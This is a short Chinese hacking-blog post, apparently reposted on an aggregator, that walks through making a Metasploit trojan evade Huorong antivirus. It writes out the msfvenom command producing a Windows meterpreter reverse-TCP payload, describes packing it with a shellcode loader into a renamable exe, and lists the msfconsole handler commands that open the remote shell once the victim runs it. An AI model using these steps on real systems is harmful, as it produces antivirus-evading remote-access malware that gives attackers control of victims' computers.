记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Shellcodeloader免杀过火绒

2022-03-29 12:20

题记

    今天脑子里面蹦出来个想法,免杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究免杀火绒吧。

环境

    Kali:192.168.0.119 win10:192.168.0.200

     工具地址:https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

     msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木马移到工具上做免杀。

生成loder.exe软件,可随意改名,运行就能上线。

3、kali开启监听。

     msfconsole

     use exploit/multi/handler

     set payload windows/x64/meterpreter/reverse_tcp

     set lhost 192.168.0.119

     exploit

     然后运行exe

     上线

4、火绒检测

     软件运行后检测。


知识来源: https://www.wangan.com/p/7fy7f37c976295cb

阅读:32425 | 评论:0 | 标签:shellcode shell

想收藏或者和大家分享这篇好文章→复制链接地址

“Shellcodeloader免杀过火绒”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁